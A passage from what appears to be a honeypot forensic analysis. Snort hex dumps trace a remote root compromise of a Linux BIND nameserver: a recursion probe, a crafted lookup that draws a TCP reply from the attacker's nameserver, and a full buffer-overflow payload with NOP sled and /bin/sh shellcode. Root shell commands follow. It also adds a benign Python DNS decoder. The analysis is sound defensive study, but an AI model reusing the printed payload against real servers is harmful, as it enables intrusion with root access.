      14 01 41 0C 52 4F 4F 54 2D 53 45 52 56 45 52 53  ..A.ROOT-SERVERS 
      03 4E 45 54 00 C0 22 00 02 00 01 00 07 E9 00 00  .NET.."......... 
      04 01 47 C0 33 C0 22 00 02 00 01 00 07 E9 00 00  ..G.3."......... 
      11 01 46 0C 47 54 4C 44 2D 53 45 52 56 45 52 53  ..F.GTLD-SERVERS 
      C0 40 C0 22 00 02 00 01 00 07 E9 00 00 04 01 46  .@."...........F 
      C0 33 C0 22 00 02 00 01 00 07 E9 00 00 04 01 49  .3."...........I 
      C0 33 C0 22 00 02 00 01 00 07 E9 00 00 04 01 45  .3."...........E 
      C0 33 C0 22 00 02 00 01 00 07 E9 00 00 04 01 4A  .3."...........J 
      C0 63 C0 22 00 02 00 01 00 07 E9 00 00 04 01 4B  .c."...........K 
      C0 63 C0 22 00 02 00 01 00 07 E9 00 00 04 01 41  .c."...........A 
      C0 63 C0 22 00 02 00 01 00 07 E9 00 00 04 01 4D  .c."...........M 
      C0 63 C0 22 00 02 00 01 00 07 E9 00 00 04 01 48  .c."...........H 
      C0 63 C0 22 00 02 00 01 00 07 E9 00 00 04 01 43  .c."...........C 
      C0 63 C0 31 00 01 00 01 00 36 EE 80 00 04 C6 29  .c.1.....6.....) 
      00 04 C0 51 00 01 00 01 00 36 EE 80 00 04 C0 70  ...Q.....6.....p 
      24 04 C0 61 00 01 00 01 00 07 E9 00 00 04 C6 11  $..a............ 
      D0 43 C0 7E 00 01 00 01 00 36 EE 80 00 04 C0 05  .C.~.....6...... 
      05 F1 C0 8E 00 01 00 01 00 36 EE 80 00 04 C0 24  .........6.....$ 
      94 11 C0 9E 00 01 00 01 00 36 EE 80 00 04 C0 CB  .........6...... 
      E6 0A C0 AE 00 01 00 01 00 07 E9 00 00 04 C6 29  ...............) 
      00 15 C0 BE 00 01 00 01 00 07 E9 00 00 04 C3 08  ................ 
      63 0B C0 CE 00 01 00 01 00 07 E9 00 00 04 C6 29  c..............) 
      03 26 C0 DE 00 01 00 01 00 07 E9 00 00 04 D2 B0  .&.............. 
      98 12 C0 EE 00 01 00 01 00 07 E9 00 00 04 D8 21  ...............! 
      4B 52 C0 FE 00 01 00 01 00 07 E9 00 00 04 CD BC  KR.............. 
      B9 12                                            .. 
      
      04/26-06:43:00.222098 172.16.1.107:1028 -> 205.188.185.18:53 
      UDP TTL:64 TOS:0x0 ID:18865 
      Len: 42 
      3D 9D 00 00 00 01 00 00 00 00 00 00 03 4E 53 30  =............NS0 
      08 45 4E 54 45 52 41 43 54 03 43 4F 4D 00 00 01  .ENTERACT.COM... 
      00 01                                            .. 
      
      04/26-06:43:00.315827 205.188.185.18:53 -> 172.16.1.107:1028 
      UDP TTL:240 TOS:0x0 ID:40907  DF 
      Len: 147 
      E6 38 80 00 00 01 00 01 00 02 00 02 07 42 49 46  .8...........BIF 
      52 4F 53 54 08 53 45 41 53 54 52 4F 4D 03 43 4F  ROST.SEASTROM.CO 
      4D 00 00 01 00 01 C0 0C 00 01 00 01 00 02 A3 00  M............... 
      00 04 C0 94 FC 0A 08 53 45 41 53 54 52 4F 4D 03  .......SEASTROM. 
      63 6F 6D 00 00 02 00 01 00 02 A3 00 00 02 C0 0C  com............. 
      C0 36 00 02 00 01 00 02 A3 00 00 0F 03 4E 53 30  .6...........NS0 
      08 45 4E 54 45 52 41 43 54 C0 3F C0 0C 00 01 00  .ENTERACT.?..... 
      01 00 02 A3 00 00 04 C0 94 FC 0A C0 5C 00 01 00  ............\... 
      01 00 02 A3 00 00 04 CF E5 8F 03                 ........... 
      
      04/26-06:43:00.317904 205.188.185.18:53 -> 172.16.1.107:1028 
      UDP TTL:240 TOS:0x0 ID:40908  DF 
      Len: 147 
      3D 9D 80 00 00 01 00 01 00 02 00 02 03 4E 53 30  =............NS0 
      08 45 4E 54 45 52 41 43 54 03 43 4F 4D 00 00 01  .ENTERACT.COM... 
      00 01 C0 0C 00 01 00 01 00 02 A3 00 00 04 CF E5  ................ 
      8F 03 08 45 4E 54 45 52 41 43 54 03 63 6F 6D 00  ...ENTERACT.com. 
      00 02 00 01 00 02 A3 00 00 13 07 42 49 46 52 4F  ...........BIFRO 
      53 54 08 53 45 41 53 54 52 4F 4D C0 3B C0 32 00  ST.SEASTROM.;.2. 
      02 00 01 00 02 A3 00 00 02 C0 0C C0 4A 00 01 00  ............J... 
      01 00 02 A3 00 00 04 C0 94 FC 0A C0 0C 00 01 00  ................ 
      01 00 02 A3 00 00 04 CF E5 8F 03                 ........... 
      
      04/26-06:43:04.462930 213.28.22.189:1045 -> 172.16.1.107:53 
      UDP TTL:40 TOS:0x0 ID:18880 
      Len: 52 
      95 6A 01 00 00 01 00 00 00 00 00 00 03 31 30 37  .j...........107 
      02 37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64  .71.80.216.in-ad 
      64 72 04 61 72 70 61 00 00 0C 00 01              dr.arpa..... 
      
      04/26-06:43:04.463599 172.16.1.107:1028 -> 192.148.252.10:53 
      UDP TTL:64 TOS:0x0 ID:18866 
      Len: 52 
      F1 8E 01 00 00 01 00 00 00 00 00 00 03 31 30 37  .............107 
      02 37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64  .71.80.216.in-ad 
      64 72 04 61 72 70 61 00 00 0C 00 01              dr.arpa..... 
      
      04/26-06:43:04.559157 192.148.252.10:53 -> 172.16.1.107:1028 
      UDP TTL:54 TOS:0x0 ID:7629 
      Len: 196 
      F1 8E 85 80 00 01 00 01 00 02 00 02 03 31 30 37  .............107 
      02 37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64  .71.80.216.in-ad 
      64 72 04 61 72 70 61 00 00 0C 00 01 C0 0C 00 0C  dr.arpa......... 
      00 01 00 01 51 80 00 1D 02 31 31 06 6C 73 70 69  ....Q....11.lspi 
      74 7A 04 73 6F 68 6F 08 65 6E 74 65 72 61 63 74  tz.soho.enteract 
      03 63 6F 6D 00 02 37 31 02 38 30 03 32 31 36 07  .com..71.80.216. 
      49 4E 2D 41 44 44 52 04 41 52 50 41 00 00 02 00  IN-ADDR.ARPA.... 
      01 00 01 51 80 00 06 03 6E 73 30 C0 47 C0 55 00  ...Q....ns0.G.U. 
      02 00 01 00 01 51 80 00 13 07 62 69 66 72 6F 73  .....Q....bifros 
      74 08 73 65 61 73 74 72 6F 6D C0 50 C0 77 00 01  t.seastrom.P.w.. 
      00 01 00 00 0E 10 00 04 CF E5 8F 03 C0 89 00 01  ................ 
      00 01 00 00 0E 10 00 04 C0 94 FC 0A              ............ 
      
      04/26-06:43:04.560130 172.16.1.107:53 -> 213.28.22.189:1045 
      UDP TTL:64 TOS:0x0 ID:18867 
      Len: 196 
      95 6A 85 80 00 01 00 01 00 02 00 02 03 31 30 37  .j...........107 
      02 37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64  .71.80.216.in-ad 
      64 72 04 61 72 70 61 00 00 0C 00 01 C0 0C 00 0C  dr.arpa......... 
      00 01 00 01 51 80 00 1D 02 31 31 06 6C 73 70 69  ....Q....11.lspi 
      74 7A 04 73 6F 68 6F 08 65 6E 74 65 72 61 63 74  tz.soho.enteract 
      03 63 6F 6D 00 02 37 31 02 38 30 03 32 31 36 07  .com..71.80.216. 
      49 4E 2D 41 44 44 52 04 41 52 50 41 00 00 02 00  IN-ADDR.ARPA.... 
      01 00 01 51 80 00 06 03 6E 73 30 C0 47 C0 55 00  ...Q....ns0.G.U. 
      02 00 01 00 01 51 80 00 13 07 62 69 66 72 6F 73  .....Q....bifros 
      74 08 73 65 61 73 74 72 6F 6D C0 50 C0 77 00 01  t.seastrom.P.w.. 
      00 01 00 00 0E 10 00 04 CF E5 8F 03 C0 89 00 01  ................ 
      00 01 00 00 0E 10 00 04 C0 94 FC 0A              ............ 
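
      Added example (not part of the original analysis): a Python decoder for the first query and the final reply above, showing the header bits the tickle depends on. RD is set in the query, RA comes back set from our server, and the root server's referral in between has RA clear. The byte strings are copied from the dump; the function names are this example's own.

```python
import struct

# Bytes copied from the dump above: the query from 213.28.22.189 and the reply sent back to it.
QUERY = bytes.fromhex("""
95 6A 01 00 00 01 00 00 00 00 00 00 03 31 30 37
02 37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64
64 72 04 61 72 70 61 00 00 0C 00 01
""")
RESPONSE = bytes.fromhex("""
95 6A 85 80 00 01 00 01 00 02 00 02 03 31 30 37
02 37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64
64 72 04 61 72 70 61 00 00 0C 00 01 C0 0C 00 0C
00 01 00 01 51 80 00 1D 02 31 31 06 6C 73 70 69
74 7A 04 73 6F 68 6F 08 65 6E 74 65 72 61 63 74
03 63 6F 6D 00 02 37 31 02 38 30 03 32 31 36 07
49 4E 2D 41 44 44 52 04 41 52 50 41 00 00 02 00
01 00 01 51 80 00 06 03 6E 73 30 C0 47 C0 55 00
02 00 01 00 01 51 80 00 13 07 62 69 66 72 6F 73
74 08 73 65 61 73 74 72 6F 6D C0 50 C0 77 00 01
00 01 00 00 0E 10 00 04 CF E5 8F 03 C0 89 00 01
00 01 00 00 0E 10 00 04 C0 94 FC 0A
""")
# First 12 bytes of the reply from 128.8.10.90 (a referral, not an answer).
REFERRAL_HEADER = bytes.fromhex("5C 21 81 00 00 01 00 00 00 02 00 00")

TYPES = {1: "A", 2: "NS", 12: "PTR"}


def parse_header(msg):
    """Split the 12-byte DNS header into id, flag bits and section counts."""
    if len(msg) < 12:
        raise ValueError("short DNS header")
    ident, flags, qd, an, ns, ar = struct.unpack("!6H", msg[:12])
    return {"id": ident, "qr": flags >> 15, "aa": (flags >> 10) & 1,
            "tc": (flags >> 9) & 1, "rd": (flags >> 8) & 1, "ra": (flags >> 7) & 1,
            "rcode": flags & 0xF, "counts": (qd, an, ns, ar)}


def read_name(msg, off):
    """Decode a name, following compression pointers; return (name, next offset)."""
    labels, end, hops = [], None, 0
    while True:
        if off >= len(msg):
            raise ValueError("name runs past end of message")
        n = msg[off]
        if n & 0xC0 == 0xC0:                      # two-byte compression pointer
            if off + 1 >= len(msg):
                raise ValueError("truncated pointer")
            end = off + 2 if end is None else end
            hops += 1
            if hops > 16:                         # guard against pointer loops
                raise ValueError("compression loop")
            off = ((n & 0x3F) << 8) | msg[off + 1]
        elif n == 0:                              # root label ends the name
            return ".".join(labels), (off + 1 if end is None else end)
        else:
            if off + 1 + n > len(msg):
                raise ValueError("label runs past end of message")
            labels.append(msg[off + 1:off + 1 + n].decode("ascii", "replace"))
            off += 1 + n


def parse_message(msg):
    """Return (header, questions, records) for one DNS message."""
    hdr = parse_header(msg)
    off, questions, records = 12, [], []
    for _ in range(hdr["counts"][0]):
        name, off = read_name(msg, off)
        qtype, _qclass = struct.unpack_from("!2H", msg, off)
        off += 4
        questions.append((name, TYPES.get(qtype, qtype)))
    for _ in range(sum(hdr["counts"][1:])):       # answer, authority, additional
        name, off = read_name(msg, off)
        rtype, _rclass, ttl, rdlen = struct.unpack_from("!2HIH", msg, off)
        off += 10
        if off + rdlen > len(msg):
            raise ValueError("rdata runs past end of message")
        if rtype == 1 and rdlen == 4:
            data = ".".join(map(str, msg[off:off + 4]))
        elif rtype in (2, 12):
            data, _ = read_name(msg, off)
        else:
            data = msg[off:off + rdlen].hex()
        records.append((name, TYPES.get(rtype, rtype), ttl, data))
        off += rdlen
    return hdr, questions, records


def recursion_confirmed(query, response):
    """True when the reply shows the server recursed on the client's behalf."""
    q, r = parse_header(query), parse_header(response)
    return (r["id"] == q["id"] and r["qr"] == 1 and q["rd"] == 1
            and r["ra"] == 1 and r["rcode"] == 0 and r["counts"][1] > 0)


if __name__ == "__main__":
    print(parse_message(RESPONSE)[2][0], recursion_confirmed(QUERY, RESPONSE))
```

      Each message is 8 bytes shorter than the Len: value snort prints for it (44 and 188 bytes against Len: 52 and Len: 196), the size of a UDP header.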
      
                  ---- COMMENT: Tickle Worked ---- 
      
      The recursive lookup worked.  Not only is our system running a vulnerable version of named, but it is recursive.  The black-hat now queries our DNS server for the name r.rsavings.net.  This is
      extremely odd: why would a remote system query my DNS server for a different domain name?  As we will soon learn, this is how the exploit works.  Our DNS server is being suckered.  Read below as
      our DNS server recursively attempts to find the NS for rsavings.net so it can query the IP address (A record) of r.rsavings.net. 
      
      04/26-06:43:04.883506 213.28.22.189:1045 -> 172.16.1.107:53 
      UDP TTL:40 TOS:0x0 ID:18882 
      Len: 40 
      95 6B 01 00 00 01 00 00 00 00 00 00 01 72 08 72  .k...........r.r 
      73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01  savings.net..... 
      
      04/26-06:43:04.884189 172.16.1.107:1028 -> 198.41.0.21:53 
      UDP TTL:64 TOS:0x0 ID:18868 
      Len: 40 
      F7 F5 01 00 00 01 00 00 00 00 00 00 01 72 08 72  .............r.r 
      73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01  savings.net..... 
      
      04/26-06:43:04.969435 198.41.0.21:53 -> 172.16.1.107:1028 
      UDP TTL:244 TOS:0x0 ID:56421  DF 
      Len: 202 
      F7 F5 81 00 00 01 00 00 00 04 00 04 01 72 08 72  .............r.r 
      73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01  savings.net..... 
      08 52 53 41 56 49 4E 47 53 03 4E 45 54 00 00 02  .RSAVINGS.NET... 
      00 01 00 02 A3 00 00 12 03 4E 53 33 08 4D 59 44  .........NS3.MYD 
      4F 4D 41 49 4E 03 43 4F 4D 00 C0 20 00 02 00 01  OMAIN.COM.. .... 
      00 02 A3 00 00 06 03 4E 53 34 C0 3C C0 20 00 02  .......NS4.<. .. 
      00 01 00 02 A3 00 00 06 03 57 57 57 C0 20 C0 20  .........WWW. . 
      00 02 00 01 00 02 A3 00 00 08 05 53 45 52 56 32  ...........SERV2 
      C0 20 C0 38 00 01 00 01 00 02 A3 00 00 04 D8 22  . .8..........." 
      59 03 C0 56 00 01 00 01 00 02 A3 00 00 04 D8 22  Y..V..........." 
      59 04 C0 68 00 01 00 01 00 02 A3 00 00 04 3F E2  Y..h..........?. 
      51 0D C0 7A 00 01 00 01 00 02 A3 00 00 04 3F E2  Q..z..........?. 
      51 0C                                            Q. 
      
      04/26-06:43:04.970963 172.16.1.107:1028 -> 198.41.3.38:53 
      UDP TTL:64 TOS:0x0 ID:18869 
      Len: 42 
      C2 4E 00 00 00 01 00 00 00 00 00 00 03 4E 53 34  .N...........NS4 
      08 4D 59 44 4F 4D 41 49 4E 03 43 4F 4D 00 00 01  .MYDOMAIN.COM... 
      00 01                                            .. 
      
      04/26-06:43:04.971751 172.16.1.107:1028 -> 198.41.3.38:53 
      UDP TTL:64 TOS:0x0 ID:18870 
      Len: 42 
      F2 0B 00 00 00 01 00 00 00 00 00 00 03 4E 53 33  .............NS3 
      08 4D 59 44 4F 4D 41 49 4E 03 43 4F 4D 00 00 01  .MYDOMAIN.COM... 
      00 01                                            .. 
      
      04/26-06:43:04.972052 172.16.1.107:1028 -> 63.226.81.13:53 
      UDP TTL:64 TOS:0x0 ID:18871 
      Len: 40 
      0C BC 01 00 00 01 00 00 00 00 00 00 01 72 08 72  .............r.r 
      73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01  savings.net..... 
      
      04/26-06:43:05.063551 198.41.3.38:53 -> 172.16.1.107:1028 
      UDP TTL:242 TOS:0x0 ID:42903  DF 
      Len: 202 
      C2 4E 80 00 00 01 00 01 00 04 00 04 03 4E 53 34  .N...........NS4 
      08 4D 59 44 4F 4D 41 49 4E 03 43 4F 4D 00 00 01  .MYDOMAIN.COM... 
      00 01 C0 0C 00 01 00 01 00 02 A3 00 00 04 D8 22  ..............." 
      59 04 08 4D 59 44 4F 4D 41 49 4E 03 43 4F 4D 00  Y..MYDOMAIN.COM. 
      00 02 00 01 00 02 A3 00 00 06 03 4E 53 31 C0 32  ...........NS1.2 
      C0 32 00 02 00 01 00 02 A3 00 00 06 03 4E 53 32  .2...........NS2 
      C0 32 C0 32 00 02 00 01 00 02 A3 00 00 06 03 4E  .2.2...........N 
      53 33 C0 32 C0 32 00 02 00 01 00 02 A3 00 00 02  S3.2.2.......... 
      C0 0C C0 4A 00 01 00 01 00 02 A3 00 00 04 D8 22  ...J..........." 
      59 01 C0 5C 00 01 00 01 00 02 A3 00 00 04 D8 22  Y..\..........." 
      59 02 C0 6E 00 01 00 01 00 02 A3 00 00 04 D8 22  Y..n..........." 
      59 03 C0 0C 00 01 00 01 00 02 A3 00 00 04 D8 22  Y.............." 
      59 04                                            Y. 
      
      04/26-06:43:05.065790 198.41.3.38:53 -> 172.16.1.107:1028 
      UDP TTL:242 TOS:0x0 ID:42904  DF 
      Len: 202 
      F2 0B 80 00 00 01 00 01 00 04 00 04 03 4E 53 33  .............NS3 
      08 4D 59 44 4F 4D 41 49 4E 03 43 4F 4D 00 00 01  .MYDOMAIN.COM... 
      00 01 C0 0C 00 01 00 01 00 02 A3 00 00 04 D8 22  ..............." 
      59 03 08 4D 59 44 4F 4D 41 49 4E 03 43 4F 4D 00  Y..MYDOMAIN.COM. 
      00 02 00 01 00 02 A3 00 00 06 03 4E 53 31 C0 32  ...........NS1.2 
      C0 32 00 02 00 01 00 02 A3 00 00 06 03 4E 53 32  .2...........NS2 
      C0 32 C0 32 00 02 00 01 00 02 A3 00 00 02 C0 0C  .2.2............ 
      C0 32 00 02 00 01 00 02 A3 00 00 06 03 4E 53 34  .2...........NS4 
      C0 32 C0 4A 00 01 00 01 00 02 A3 00 00 04 D8 22  .2.J..........." 
      59 01 C0 5C 00 01 00 01 00 02 A3 00 00 04 D8 22  Y..\..........." 
      59 02 C0 0C 00 01 00 01 00 02 A3 00 00 04 D8 22  Y.............." 
      59 03 C0 7C 00 01 00 01 00 02 A3 00 00 04 D8 22  Y..|..........." 
      59 04                                            Y. 
      
                  --- COMMENT:  Buffer Overflow!  --- 
      
      Our nameserver identifies the nameserver for rsavings.net, 63.226.81.13. Our simple UDP DNS request for r.rsavings.net should have resulted in a simple UDP reply containing an answer.  However,
      we get a TCP connection instead, which is used for the buffer overflow attack.  The following packets are the actual buffer overflow attack. Notice the '/bin/sh' script run at the end of the buffer
      overflow.  That is the whole purpose of the exploit.  NOTE:  Based on passive fingerprinting, another forensic tool, this system also appears to be a Linux box. 
      
      04/26-06:43:05.096725 63.226.81.13:1351 -> 172.16.1.107:53 
      TCP TTL:49 TOS:0x0 ID:26472  DF 
      **S***** Seq: 0x45B8E7   Ack: 0x0   Win: 0x7D78 
      TCP Options => MSS: 1460 SackOK TS: 4037587 0 NOP WS: 0 
      
      04/26-06:43:05.097443 172.16.1.107:53 -> 63.226.81.13:1351 
      TCP TTL:64 TOS:0x0 ID:18872  DF 
      **S***A* Seq: 0x3FA07873   Ack: 0x45B8E8   Win: 0x7D78 
      TCP Options => MSS: 1460 SackOK TS: 144023498 4037587 NOP WS: 0 
      
      04/26-06:43:05.204503 63.226.81.13:1351 -> 172.16.1.107:53 
      TCP TTL:50 TOS:0x0 ID:26473  DF 
      ******A* Seq: 0x45B8E8   Ack: 0x3FA07874   Win: 0x7D78 
      TCP Options => NOP NOP TS: 4037599 144023498 
      
      04/26-06:43:05.205940 63.226.81.13:1351 -> 172.16.1.107:53 
      TCP TTL:50 TOS:0x0 ID:26474  DF 
      *****PA* Seq: 0x45B8E8   Ack: 0x3FA07874   Win: 0x7D78 
      TCP Options => NOP NOP TS: 4037599 144023498 
      19 C8                                            .. 
      
      04/26-06:43:05.206168 172.16.1.107:53 -> 63.226.81.13:1351 
      TCP TTL:64 TOS:0x0 ID:18873  DF 
      ******A* Seq: 0x3FA07874   Ack: 0x45B8EA   Win: 0x7D78 
      TCP Options => NOP NOP TS: 144023509 4037599 
        
      
      04/26-06:43:05.244101 63.226.81.13:1351 -> 172.16.1.107:53 
      TCP TTL:50 TOS:0x0 ID:26475  DF 
      *****PA* Seq: 0x45B8EA   Ack: 0x3FA07874   Win: 0x7D78 
      TCP Options => NOP NOP TS: 4037599 144023498 
      0C BC 84 00 00 01 00 01 00 00 00 01 01 72 08 72  .............r.r 
      73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01  savings.net..... 
      01 72 08 72 73 61 76 69 6E 67 73 03 6E 65 74 00  .r.rsavings.net. 
      00 01 00 01 00 00 01 2C 00 04 01 02 03 04 01 72  .......,.......r 
      08 72 73 61 76 69 6E 67 73 03 6E 65 74 00 00 1E  .rsavings.net... 
      00 01 00 00 01 2C 19 6B 00 06 61 64 6D 61 64 6D  .....,.k..admadm 
      00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................ 
      90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................ 
      
          --- repeated NOPs (0x90) removed for brevity --- 
      
      90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................ 
      90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................ 
      90 90 90 90 90 90 90 90 90 90 90 90 90 90 E9 AC  ................ 
      01 00 00 5E 89 76 0C 8D 46 08 89 46 10 8D 46 2E  ...^.v..F..F..F. 
      89 46 14 56 EB 54 5E 89 F3 B9 00 00 00 00 BA 00  .F.V.T^......... 
      00 00 00 B8 05 00 00 00 CD 80 50 8D 5E 02 B9 FF  ..........P.^... 
      01 00 00 B8 27 00 00 00 CD 80 8D 5E 02 B8 3D 00  ....'......^..=. 
      00 00 CD 80 5B 53 B8 85 00 00 00 CD 80 5B B8 06  ....[S.......[.. 
      00 00 00 CD 80 8D 5E 0B B8 0C 00 00 00 CD 80 89  ......^......... 
      F3 B8 3D 00 00 00 CD 80 EB 2C E8 A7 FF FF FF 2E  ..=......,...... 
      00 41 44 4D 52 4F 43 4B 53 00 2E 2E 2F 2E 2E 2F  .ADMROCKS.../../ 
      2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E  ../../../../../. 
      2E 2F 2E 2E 2F 00 5E B8 02 00 00 00 CD 80 89 C0  ./../.^......... 
      85 C0 0F 85 8E 00 00 00 89 F3 8D 4E 0C 8D 56 18  ...........N..V. 
      B8 0B 00 00 00 CD 80 B8 01 00 00 00 CD 80 E8 75  ...............u 
      00 00 00 10 00 00 00 00 00 00 00 74 68 69 73 69  ...........thisi 
      73 73 6F 6D 65 74 65 6D 70 73 70 61 63 65 66 6F  ssometempspacefo 
      72 74 68 65 73 6F 63 6B 69 6E 61 64 64 72 69 6E  rthesockinaddrin 
      79 65 61 68 79 65 61 68 69 6B 6E 6F 77 74 68 69  yeahyeahiknowthi 
      73 69 73 6C 61 6D 65 62 75 74 61 6E 79 77 61 79  sislamebutanyway 
      77 68 6F 63 61 72 65 73 68 6F 72 69 7A 6F 6E 67  whocareshorizong 
      6F 74 69 74 77 6F 72 6B 69 6E 67 73 6F 61 6C 6C  otitworkingsoall 
      69 73 63 6F 6F 6C EB 86 5E 56 8D 46 08 50 8B 46  iscool..^V.F.P.F 
      04 50 FF 46 04 89 E1 BB 07 00 00 00 B8 66 00 00  .P.F.........f.. 
      00 CD 80 83 C4 0C 89 C0 85 C0 75 DA 66 83 7E 08  ..........u.f.~. 
      02 75 D3 8B 56 04 4A 52 89 D3 B9 00 00 00 00 B8  .u..V.JR........ 
      3F 00 00 00 CD 80 5A 52 89 D3 B9 01 00 00 00 B8  ?.....ZR........ 
      3F 00 00 00 CD 80 5A 52 89 D3 B9 02 00 00 00 B8  ?.....ZR........ 
      3F 00 00 00 CD 80 EB 12 5E 46 46 46 46 46 C7 46  ?.......^FFFFF.F 
      10 00 00 00 00 E9 FE FE FF FF E8 E9 FF FF FF E8  ................ 
      4F FE FF FF 2F 62 69 6E 2F 73 68 00 2D 63 00 FF  O.../bin/sh.-c.. 
      FF FF FF FF FF FF FF FF FF FF FF FF 00 00 00 00  ................ 
      70 6C 61 67 75 65 7A 5B 41 44 4D 5D 31 30 2F 39  plaguez[ADM]10/9 
      39 2D 65 78 69 74 00 90 90 90 90 90 90 90 90 90  9-exit.......... 
      90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................ 
      90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................ 
      90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................ 
      90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................ 
      90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................ 
      90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................ 
      90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................ 
      90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................ 
      90 90 90 90 90 90 90 90 C3 D6 FF BF C3 D6 FF BF  ................ 
      C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF  ................ 
      C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF  ................ 
      C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF  ................ 
      C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF  ................ 
      C3 D6 FF BF C3 D6 FF BF 00 00 00 00 00 00 00 00  ................ 
      00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................ 
      00 00 00 00 00 00 00 00                          ........ 
      
                  --- COMMENT:  The script --- 
      
      Now that the buffer overflow has been launched, we have a root shell.  Something must be done with that root shell. Our black-hat runs the following commands with that shell.  He first confirms
      the system architecture (uname -a) and the shell uid (id).  He then inserts two accounts onto the system, twin and hantu. 
      
      04/26-06:43:05.483639 172.16.1.107:53 -> 63.226.81.13:1351 
      TCP TTL:64 TOS:0x0 ID:18876  DF 
      ******A* Seq: 0x3FA07874   Ack: 0x45D2B2   Win: 0x7C70 
      TCP Options => NOP NOP TS: 144023537 4037617 
      
      04/26-06:43:06.219868 63.226.81.13:1351 -> 172.16.1.107:53 
      TCP TTL:50 TOS:0x0 ID:26480  DF 
      *****PA* Seq: 0x45D2B2   Ack: 0x3FA07874   Win: 0x7D78 
      TCP Options => NOP NOP TS: 4037700 144023537 
      63 64 20 2F 3B 20 75 6E 61 6D 65 20 2D 61 3B 20  cd /; uname -a; 
      70 77 64 3B 20 69 64 3B 0A                       pwd; id;. 
      
      04/26-06:43:06.233691 172.16.1.107:53 -> 63.226.81.13:1351 
      TCP TTL:64 TOS:0x0 ID:18877  DF 
      ******A* Seq: 0x3FA07874   Ack: 0x45D2CB   Win: 0x7C70 
      TCP Options => NOP NOP TS: 144023612 4037700 
      
      04/26-06:43:06.236460 172.16.1.107:53 -> 63.226.81.13:1351 
      TCP TTL:64 TOS:0x0 ID:18878  DF 
      *****PA* Seq: 0x3FA07874   Ack: 0x45D2CB   Win: 0x7C70 
      TCP Options => NOP NOP TS: 144023612 4037700 
      4C 69 6E 75 78 20 61 70 6F 6C 6C 6F 2E 75 69 63  Linux apollo.uic 
      6D 62 61 2E 65 64 75 20 32 2E 32 2E 35 2D 31 35  mba.edu 2.2.5-15 
      20 23 31 20 4D 6F 6E 20 41 70 72 20 31 39 20 32   #1 Mon Apr 19 2 
      32 3A 32 31 3A 30 39 20 45 44 54 20 31 39 39 39  2:21:09 EDT 1999 
      20 69 35 38 36 20 75 6E 6B 6E 6F 77 6E 0A         i586 unknown. 
      
      04/26-06:43:06.346489 63.226.81.13:1351 -> 172.16.1.107:53 
      TCP TTL:50 TOS:0x0 ID:26482  DF 
      ******A* Seq: 0x45D2CB   Ack: 0x3FA078C2   Win: 0x7D78 
      TCP Options => NOP NOP TS: 4037713 144023612 
      
      04/26-06:43:06.346819 172.16.1.107:53 -> 63.226.81.13:1351 
      TCP TTL:64 TOS:0x0 ID:18879  DF 
      *****PA* Seq: 0x3FA078C2   Ack: 0x45D2CB   Win: 0x7C70 
      TCP Options => NOP NOP TS: 144023623 4037713 
      2F 0A 75 69 64 3D 30 28 72 6F 6F 74 29 20 67 69  /.uid=0(root) gi 
      64 3D 30 28 72 6F 6F 74 29 20 67 72 6F 75 70 73  d=0(root) groups 
      3D 30 28 72 6F 6F 74 29 2C 31 28 62 69 6E 29 2C  =0(root),1(bin), 
      32 28 64 61 65 6D 6F 6E 29 2C 33 28 73 79 73 29  2(daemon),3(sys) 
      2C 34 28 61 64 6D 29 2C 36 28 64 69 73 6B 29 2C  ,4(adm),6(disk), 
      31 30 28 77 68 65 65 6C 29 0A                    10(wheel). 
      
      04/26-06:43:06.486257 63.226.81.13:1351 -> 172.16.1.107:53 
      TCP TTL:50 TOS:0x0 ID:26483  DF 
      ******A* Seq: 0x45D2CB   Ack: 0x3FA0791C   Win: 0x7D78 
      TCP Options => NOP NOP TS: 4037727 144023623 
      
      04/26-06:43:09.880779 213.28.22.189:1045 -> 172.16.1.107:53 
      UDP TTL:40 TOS:0x0 ID:18907 
      Len: 40 
      95 6B 01 00 00 01 00 00 00 00 00 00 01 72 08 72  .k...........r.r 
      73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01  savings.net..... 
      
      04/26-06:43:19.875096 213.28.22.189:1045 -> 172.16.1.107:53 
      UDP TTL:40 TOS:0x0 ID:18941 
      Len: 40 
      95 6B 01 00 00 01 00 00 00 00 00 00 01 72 08 72  .k...........r.r 
      73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01  savings.net..... 
      
      04/26-06:43:39.856657 213.28.22.189:1045 -> 172.16.1.107:53 
      UDP TTL:40 TOS:0x0 ID:19019 
      Len: 40 
      95 6B 01 00 00 01 00 00 00 00 00 00 01 72 08 72  .k...........r.r 
      73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01  savings.net..... 
      
      04/26-06:44:00.432457 63.226.81.13:1351 -> 172.16.1.107:53 
      TCP TTL:50 TOS:0x0 ID:26498  DF 
